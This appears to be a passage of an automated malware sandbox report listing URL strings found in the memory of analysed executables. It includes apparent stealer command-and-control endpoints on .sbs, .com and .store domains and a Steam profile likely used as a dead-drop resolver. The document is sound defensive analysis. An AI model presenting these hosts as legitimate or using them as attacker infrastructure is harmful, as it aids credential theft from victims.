Source: file1.exe, 00000018.00000003.2861364210.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2853326516.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813789486.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2852926387.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2861763986.0000000001342000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2753737498.0000000001356000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2784537176.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883648757.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2818198727.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786414749.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2753913116.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813748659.000000000136F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883266694.0000000001342000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/
Source: file1.exe, 00000018.00000002.2881058680.00000000012E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/#
Source: file1.exe, 00000018.00000003.2861763986.0000000001342000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883266694.0000000001342000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/)
Source: file1.exe, 00000018.00000003.2767540588.000000000135D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/22
Source: file1.exe, 00000018.00000003.2852926387.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883648757.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797891117.0000000001378000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797500848.0000000001374000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2861521129.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.0000000001378000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.0000000001377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/7
Source: file1.exe, 00000018.00000003.2861763986.0000000001342000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883266694.0000000001342000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/Cy
Source: file1.exe, 00000018.00000003.2784537176.0000000001348000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2786414749.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/I
Source: file1.exe, 00000018.00000003.2852926387.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2753737498.0000000001356000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2783238474.000000000135D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2883648757.0000000001371000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773960825.000000000135F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2767540588.000000000135D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813748659.000000000136F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/api
Source: file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813748659.000000000136F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/api7
Source: file1.exe, 00000018.00000003.2784335486.0000000001354000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2783238474.000000000135D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813711418.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2818198727.000000000136B000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813431961.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2785238032.000000000135D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/api9)
Source: file1.exe, 00000018.00000003.2852926387.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2823212852.000000000136C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apiF
Source: file1.exe, 00000018.00000002.2881058680.000000000128E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/n
Source: file1.exe, 00000018.00000003.2797370105.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs:443/apiMicrosoft
Source: file1.exe, 00000018.00000002.2883648757.0000000001377000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2861521129.0000000001377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs:443/apifffla
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 4136f86ac7.exe, 0000001E.00000003.2929916767.0000000005604000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929730577.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvI
Source: file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3090918742.0000000005CAC000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 4136f86ac7.exe, 00000025.00000003.3091077119.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3095179623.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3093531602.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096193571.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096841796.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191846589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3095820288.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowe
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: 4136f86ac7.exe, 00000025.00000003.3119814255.000000000157B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/(
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/PAO
Source: 4136f86ac7.exe, 00000025.00000003.3091077119.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3093531602.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/S
Source: 4136f86ac7.exe, 0000001E.00000003.2903431989.0000000005606000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993268690.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2959514495.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2903502679.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2943712175.00000000055F8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2889137104.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2918876574.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993587822.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2877411735.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B23000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091077119.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3093531602.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.000000000150F000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096193571.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3097797490.000000000156E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3119814255.0000000001580000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3098474106.0000000001573000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/api
Source: 4136f86ac7.exe, 00000025.00000003.3191846589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/apie
Source: 4136f86ac7.exe, 00000025.00000003.3119814255.0000000001580000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191607562.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/apih
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/apii
Source: 4136f86ac7.exe, 0000001E.00000003.2866249485.0000000000AA5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/apiile
Source: 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/apis
Source: 4136f86ac7.exe, 0000001E.00000003.2903431989.0000000005606000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/apiw
Source: 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/c
Source: 4136f86ac7.exe, 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3119814255.000000000157B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com/k
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com:443/api
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://marshal-zhukov.com:443/apiicrosoft
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: file1.exe, 00000018.00000003.2773611648.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773494993.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773060112.0000000005A95000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892615043.000000000560E000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892291447.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892476979.000000000560B000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3059264012.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3058101617.0000000005D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.comXID/
Source: file1.exe, 00000018.00000003.2773611648.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773494993.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2773060112.0000000005A95000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892615043.000000000560E000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892291447.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2892476979.000000000560B000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3059264012.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3058101617.0000000005D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.comXIDv10:
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store:443/api
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store/
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store/0
Source: 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store/api
Source: 4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store/h
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store:443/api
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com//
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/H
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/lstu
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001507000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611997243319008
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900v
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
